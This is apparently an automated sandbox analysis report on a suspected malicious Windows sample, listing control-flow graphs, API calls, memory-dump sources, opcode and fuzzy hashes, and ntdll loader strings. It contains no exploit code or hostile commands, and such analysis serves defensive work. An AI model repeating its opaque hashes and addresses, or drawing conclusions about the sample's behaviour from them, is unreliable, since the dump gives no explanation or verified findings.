                                                                                                                • Not Executed
                                                                                                                control_flow_graph 15 414824-41482e 16 414831-414839 15->16 16->16 17 41483b-414841 16->17 18 414843-414851 17->18 19 4148a8-414911 call 42f103 call 42fb13 call 418073 call 404993 call 4257a3 17->19 18->19 30 414933-414938 19->30 31 414913-414924 PostThreadMessageW 19->31 31->30 32 414926-414930 31->32 32->30
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_400000_suBpo1g13Q.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: FxK39HI69$FxK39HI69
                                                                                                                • API String ID: 0-3041768509
                                                                                                                • Opcode ID: e809d10b2df605192260c225c11581352bf82915e723d6c3714eb547341594ba
                                                                                                                • Instruction ID: 7f762695ba48a771e042b5c2ae19c2afe9d40c742d9ed6acbf574584f19cbc1d
                                                                                                                • Opcode Fuzzy Hash: e809d10b2df605192260c225c11581352bf82915e723d6c3714eb547341594ba
                                                                                                                • Instruction Fuzzy Hash: 9D212671E40298BAEB319A61DC02FDF7F78CF82714F54415AFA407B281D6B85605C7A5

Control-flow Graph
control_flow_graph 33 4148a3-4148b3 34 4148bc-414911 call 42fb13 call 418073 call 404993 call 4257a3 33->34 35 4148b7 call 42f103 33->35 44 414933-414938 34->44 45 414913-414924 PostThreadMessageW 34->45 35->34 45->44 46 414926-414930 45->46 46->44
APIs
• PostThreadMessageW.USER32(FxK39HI69,00000111,00000000,00000000), ref: 00414920
Memory Dump Source
• Source File: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_suBpo1g13Q.jbxd
Similarity
• API ID: MessagePostThread
• String ID: FxK39HI69$FxK39HI69
• API String ID: 1836367815-3041768509
• Opcode ID: 712bf6d8a0fd3c13a99f64cea5298bb847ecf6f573ffe100077d284699f795e1
• Instruction ID: 06275326bfcfe334d665a737c0e6c814b1b47600fecc189605aa7a9ab7fdd71d
• Opcode Fuzzy Hash: 712bf6d8a0fd3c13a99f64cea5298bb847ecf6f573ffe100077d284699f795e1
• Instruction Fuzzy Hash: B4018871E40218B6DB219BA1DC02FDF7B7C9F81754F44406AFA047B281E6B85A06C7E9

Control-flow Graph
control_flow_graph 47 41489f-4148b3 48 4148bc-414911 call 42fb13 call 418073 call 404993 call 4257a3 47->48 49 4148b7 call 42f103 47->49 58 414933-414938 48->58 59 414913-414924 PostThreadMessageW 48->59 49->48 59->58 60 414926-414930 59->60 60->58
APIs
• PostThreadMessageW.USER32(FxK39HI69,00000111,00000000,00000000), ref: 00414920
Memory Dump Source
• Source File: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_suBpo1g13Q.jbxd
Similarity
• API ID: MessagePostThread
• String ID: FxK39HI69$FxK39HI69
• API String ID: 1836367815-3041768509
• Opcode ID: 079961bf664a41a12839ba32e99da1bc88fb204c1504df03119bf553b2bce66d
• Instruction ID: ebd93ba47acf01b312f30065a039388c1d3d66d99c084bea9912ab45183c46c8
• Opcode Fuzzy Hash: 079961bf664a41a12839ba32e99da1bc88fb204c1504df03119bf553b2bce66d
• Instruction Fuzzy Hash: 0C01BE71E40258B6EB219BA1DC02FDF7F789F81758F44406AFE047B281E6B85A06C7E5

Control-flow Graph
control_flow_graph 208 42d2c3-42d304 call 404a23 call 42e1d3 RtlAllocateHeap
APIs
• RtlAllocateHeap.NTDLL(?,0041EE44,?,?,00000000,?,0041EE44,?,?,?), ref: 0042D2FF
Memory Dump Source
• Source File: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_suBpo1g13Q.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: a2f824270edb07da026668b3351f5c530ff532050f34b3e1bc380a0675382d08
• Instruction ID: 94da825c5e0379175a4fc2619c67b3be0d438c602da57c229c1b9970ca3de9e8
• Opcode Fuzzy Hash: a2f824270edb07da026668b3351f5c530ff532050f34b3e1bc380a0675382d08
• Instruction Fuzzy Hash: F6E06D722042087BCA14EE59EC41EAB73ACDFC9710F100029FA08A7241CA70B9118BB9

Control-flow Graph
control_flow_graph 213 42d313-42d351 call 404a23 call 42e1d3 RtlFreeHeap
APIs
• RtlFreeHeap.NTDLL(00000000,00000004,00000000,8D000003,00000007,00000000,00000004,00000000,004178E6,000000F4), ref: 0042D34C
Memory Dump Source
• Source File: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_suBpo1g13Q.jbxd
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: f2383aa6925ab6171127b6a46be8bf85223e3a4f38de851793f92adcb4611226
• Instruction ID: de78460a75d36d4374bd30a59f755e3c7b58459cb35acb6fba88effa7fc235cb
• Opcode Fuzzy Hash: f2383aa6925ab6171127b6a46be8bf85223e3a4f38de851793f92adcb4611226
• Instruction Fuzzy Hash: ABE092723002187BD614EE59EC41FAB77ADEFC9710F004419FE08A7641C670BD108BB9

Control-flow Graph
control_flow_graph 223 42d353-42d38c call 404a23 call 42e1d3 ExitProcess
APIs
• ExitProcess.KERNEL32(?,00000000,00000000,?,03606DCE,?,?,03606DCE), ref: 0042D387
Memory Dump Source
• Source File: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_suBpo1g13Q.jbxd
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: 00d430379dcb5ce6cf48f7915b54ce4f0b18540f15f5cebdaaf3d17163163789
• Instruction ID: c130a3190356806db0a69e50bcfcbfdc1da52aee1636262697e61616a99991f0
• Opcode Fuzzy Hash: 00d430379dcb5ce6cf48f7915b54ce4f0b18540f15f5cebdaaf3d17163163789
• Instruction Fuzzy Hash: E8E04F36610214BBD520EA6ADC41F9B775CDFC5714F00442AFA08A7142C674B91187B4

Control-flow Graph
control_flow_graph 228 14e2c0a-14e2c0f 229 14e2c1f-14e2c26 LdrInitializeThunk 228->229 230 14e2c11-14e2c18 228->230
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: e933643d2bd402a1c70d2beb2c9b76b129c67b5768589a95e4d345f28badb75c
• Instruction ID: 7627eb4da1eeec7efbf268b741abcc1eeb06c3414949976c7f439cf47671bffd
• Opcode Fuzzy Hash: e933643d2bd402a1c70d2beb2c9b76b129c67b5768589a95e4d345f28badb75c
• Instruction Fuzzy Hash: 37B09B71D015C5C5DE11E764460CB177954B7D1701F15C167D3030653F4778C1E5E275
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
• API String ID: 0-2160512332
• Opcode ID: 0b44cd157f8c513f2629ee80b4c8092ecd2f7c9e00c1484ec683c9d2d73f0aef
• Instruction ID: d7302e2a642c7618318dfde74e668421b1043f02cde5208e84bd3a47bbaa8e45
• Opcode Fuzzy Hash: 0b44cd157f8c513f2629ee80b4c8092ecd2f7c9e00c1484ec683c9d2d73f0aef
• Instruction Fuzzy Hash: C092C3766083529FE721DF29C880F6BB7E8BB85710F14491EFA94DB2A0D770E844CB52
Strings
• undeleted critical section in freed memory, xrefs: 0151542B
• Critical section address, xrefs: 01515425, 015154BC, 01515534
• Thread is in a state in which it cannot own a critical section, xrefs: 01515543
• Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015154CE
• double initialized or corrupted critical section, xrefs: 01515508
• corrupted critical section, xrefs: 015154C2
• Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0151540A, 01515496, 01515519
• Thread identifier, xrefs: 0151553A
• First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015154E2
• Invalid debug info address of this critical section, xrefs: 015154B6
• Critical section debug info address, xrefs: 0151541F, 0151552E
• Address of the debug info found in the active list., xrefs: 015154AE, 015154FA
• Critical section address., xrefs: 01515502
• 8, xrefs: 015152E3
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
• API String ID: 0-2368682639
• Opcode ID: 570a105855547e9f11150c6e91796e8d34d89d424b69604352f31710c99cd996
• Instruction ID: cbf00edc6d1f5be00919fbfcaea24ce6cd813a275f4c04b1b1da8554aa43631d
• Opcode Fuzzy Hash: 570a105855547e9f11150c6e91796e8d34d89d424b69604352f31710c99cd996
• Instruction Fuzzy Hash: 0B81AFB1A40349AFEF21CF99C844FAEBBF5BB49714F60411AF504BB260E3B1A945CB50
Strings
• SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01512498
• SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015124C0
• @, xrefs: 0151259B
• SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01512602
• SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015122E4
• SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015125EB
• SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01512624
• SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01512412
• RtlpResolveAssemblyStorageMapEntry, xrefs: 0151261F
• SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01512409
• SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01512506
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
• API String ID: 0-4009184096
• Opcode ID: 2478a79844f0e067158a8ec65e796e262cb80fe9ebe86b97e50dda0320e066ba
• Instruction ID: c2a1732ac9a0f7517bdb6c4558ca02bbf24d2189d39e975171247d871cf68704
• Opcode Fuzzy Hash: 2478a79844f0e067158a8ec65e796e262cb80fe9ebe86b97e50dda0320e066ba
• Instruction Fuzzy Hash: 09028FB1D002299BEF31DB54CC90B9EB7B8BB55704F1041DAE609AB251EB709F84CF69
Memory Dump Source
• Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
Similarity
• API ID:
• String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimeuserer.exe$services.exe$smss.exe$svchost.exe
• API String ID: 0-2515994595
• Opcode ID: ce479c92ea8d198b1ec215ed8566ab7723089919ebb80bb82363e5906ea36451
• Instruction ID: 22d1dcfa56d317b8918360c9cef4ca587fc48ad00235cfa6b3bf73e81592caca
• Opcode Fuzzy Hash: ce479c92ea8d198b1ec215ed8566ab7723089919ebb80bb82363e5906ea36451
• Instruction Fuzzy Hash: 1651F0715053019BD725CF59C848BABBBE8FF94358F58092EE999CB250E770E608C792
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                • API String ID: 0-1700792311
                                                                                                                • Opcode ID: 2e4bcfff9d306a00752ee4ab30ea3940f42a83f5658669c2961f937167c136c6
                                                                                                                • Instruction ID: a07452ce7f89f6ca49872ea0b3315f9ab7daf10fa2f54500460d7be190806f17
                                                                                                                • Opcode Fuzzy Hash: 2e4bcfff9d306a00752ee4ab30ea3940f42a83f5658669c2961f937167c136c6
                                                                                                                • Instruction Fuzzy Hash: C3D1EA31600286DFDB62DF69C460AAEBFF1FF5A704F19804AF8459F2A2C7349981CB11
                                                                                                                Strings
                                                                                                                • VerifierFlags, xrefs: 01528C50
                                                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01528A67
                                                                                                                • VerifierDebug, xrefs: 01528CA5
                                                                                                                • VerifierDlls, xrefs: 01528CBD
                                                                                                                • HandleTraces, xrefs: 01528C8F
                                                                                                                • AVRF: -*- final list of providers -*- , xrefs: 01528B8F
                                                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01528A3D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                • API String ID: 0-3223716464
                                                                                                                • Opcode ID: 39e8e2a671b8e46b1c96405224508c3920fd9df5d6d9889a7c20fdfa6d343a58
                                                                                                                • Instruction ID: 70a1b087c43ab8cd5283c30841a96ad1a91f4ff01482d0b31fcf8d938be0dbff
                                                                                                                • Opcode Fuzzy Hash: 39e8e2a671b8e46b1c96405224508c3920fd9df5d6d9889a7c20fdfa6d343a58
                                                                                                                • Instruction Fuzzy Hash: 579138736053229FDB22DFA8C880B1E77E4FB96B14F46085EFA406F290D7709818C796
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                • API String ID: 0-1109411897
                                                                                                                • Opcode ID: cf4cffc2a9ec393ea0a9314cc2a9d3fdcf95612ad979345cb029fa4338d28aec
                                                                                                                • Instruction ID: 67f313f59be3dffa2246ce01257aa25f61522889fd4fa1b00ab282747586e986
                                                                                                                • Opcode Fuzzy Hash: cf4cffc2a9ec393ea0a9314cc2a9d3fdcf95612ad979345cb029fa4338d28aec
                                                                                                                • Instruction Fuzzy Hash: 0BA25D74A0562A8BDB65CF58CC887AEBBB5BF55300F5542EAD50DA73A0DB309E85CF00
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                • API String ID: 0-792281065
                                                                                                                • Opcode ID: e191379bf3fed20c06d2a10721833766ca6957a337c86e68e9feb429d7e9ea04
                                                                                                                • Instruction ID: 14533bf910bedcf7da275a986b5df3977d6fc6e3af0c58c7bc80d26f2af7da8c
                                                                                                                • Opcode Fuzzy Hash: e191379bf3fed20c06d2a10721833766ca6957a337c86e68e9feb429d7e9ea04
                                                                                                                • Instruction Fuzzy Hash: 4D914770A403129BFF36DF19D854BAE3BA1BB51B24F12012FE5206F2A9D7B48846C795
                                                                                                                Strings
                                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 014F9A2A
                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 014F9A11, 014F9A3A
                                                                                                                • apphelp.dll, xrefs: 01496496
                                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 014F9A01
                                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 014F99ED
                                                                                                                • LdrpInitShimEngine, xrefs: 014F99F4, 014F9A07, 014F9A30
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                • API String ID: 0-204845295
                                                                                                                • Opcode ID: bc279b9e7220cb5ac3888e7e4de892b88d98256adaa5ed1fcfcf8bfd493670fb
                                                                                                                • Instruction ID: fb88824b49cc1f49651b8dbefb44ae9a10b64df75972096766a31f6b85119f4b
                                                                                                                • Opcode Fuzzy Hash: bc279b9e7220cb5ac3888e7e4de892b88d98256adaa5ed1fcfcf8bfd493670fb
                                                                                                                • Instruction Fuzzy Hash: 3351D1716083419FEB25DF25D881FAB7BE4FB94648F12091FF6959B270D630E908CB92
                                                                                                                Strings
                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01512180
                                                                                                                • RtlGetAssemblyStorageRoot, xrefs: 01512160, 0151219A, 015121BA
                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01512178
                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015121BF
                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 01512165
                                                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0151219F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                • API String ID: 0-861424205
                                                                                                                • Opcode ID: c94525e7c91cd4f7d8c3bce0a03ebfba629181ce2694afdaa923edb23490b86a
                                                                                                                • Instruction ID: 4fb1bbc4033ed35ae0c98e949b5fe8e621c2303d81497987afee526a68e9205a
                                                                                                                • Opcode Fuzzy Hash: c94525e7c91cd4f7d8c3bce0a03ebfba629181ce2694afdaa923edb23490b86a
                                                                                                                • Instruction Fuzzy Hash: 14312B36F4022577FF22DA998C91F5F7B78EFA5A50F25005BFA04AB254D2B09E01C7A0
                                                                                                                Strings
                                                                                                                • LdrpInitializeImportRedirection, xrefs: 01518177, 015181EB
                                                                                                                • Loading import redirection DLL: '%wZ', xrefs: 01518170
                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 014DC6C3
                                                                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 015181E5
                                                                                                                • LdrpInitializeProcess, xrefs: 014DC6C4
                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01518181, 015181F5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                • API String ID: 0-475462383
                                                                                                                • Opcode ID: 274f89d3c1957d903a2992abf2b9667e2f8ee90ec572dc0a37f2bb44ba6d049d
                                                                                                                • Instruction ID: 9228738d3101afce417556f91b59268f25e8e8451a19039278afafea292f2a8a
                                                                                                                • Opcode Fuzzy Hash: 274f89d3c1957d903a2992abf2b9667e2f8ee90ec572dc0a37f2bb44ba6d049d
                                                                                                                • Instruction Fuzzy Hash: A63102726443029BD221EF29D886E2E7BD5FFA4B20F05055DF945AB3A1E670EC04C7A2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 014E2DF0: LdrInitializeThunk.NTDLL ref: 014E2DFA
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014E0BA3
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014E0BB6
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014E0D60
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014E0D74
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 1404860816-0
                                                                                                                • Opcode ID: ff57d8ea7521b702f856450718e48339ac3212ec32795b853c19e4179856cd89
                                                                                                                • Instruction ID: 2579d7c9c1146aaa73cc8ec389d1dc4c546eeb65eb6f418142fbd2580a974467
                                                                                                                • Opcode Fuzzy Hash: ff57d8ea7521b702f856450718e48339ac3212ec32795b853c19e4179856cd89
                                                                                                                • Instruction Fuzzy Hash: 05428C71A00705DFEB21CF28C884BAAB7F5FF04315F0445AAE999DB255D7B0AA85CF60
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                • API String ID: 0-3126994380
                                                                                                                • Opcode ID: c41acb849a0c6ca7dd0244ee542d6ed49d7c69398a19a49362803f12134c2d32
                                                                                                                • Instruction ID: cdabc629ceebb15963003810b79267ddfac4fd6aca8a97a7e5430adcab96591d
                                                                                                                • Opcode Fuzzy Hash: c41acb849a0c6ca7dd0244ee542d6ed49d7c69398a19a49362803f12134c2d32
                                                                                                                • Instruction Fuzzy Hash: 3492BC71A042499FDB25CF69C484BEEBBF1FF48310F18805AE859AB361D774A946CF60
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                • API String ID: 0-379654539
                                                                                                                • Opcode ID: 4ce6dd16af418cea8afe4a4bac20bf67d60b5de50501dbec6a4e8902ca4e8ce0
                                                                                                                • Instruction ID: 7f0be1b4b92a90b592f0330b88f8431a744625f078c8b1eb5fa1ab9836319c5b
                                                                                                                • Opcode Fuzzy Hash: 4ce6dd16af418cea8afe4a4bac20bf67d60b5de50501dbec6a4e8902ca4e8ce0
                                                                                                                • Instruction Fuzzy Hash: FAC1BC75108382CFD722CF58C144B6ABBE4BFA8704F55486EF9958B3A1E334C94ACB56
                                                                                                                Strings
                                                                                                                • @, xrefs: 014D8591
                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 014D8421
                                                                                                                • LdrpInitializeProcess, xrefs: 014D8422
                                                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 014D855E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.1637461688.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_1470000_suBpo1g13Q.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                • API String ID: 0-1918872054
                                                                                                                • Opcode ID: 2cb1fd4f6aaa7d84905f9f60aceb747eb0b491584bc44df087ed5028b822acd8
                                                                                                                • Instruction ID: 2b67b448bb2b38f1f945dfc011c8a64de85c20bfb3ac30b7d7268b10dafa0d7a
                                                                                                                • Opcode Fuzzy Hash: 2cb1fd4f6aaa7d84905f9f60aceb747eb0b491584bc44df087ed5028b822acd8
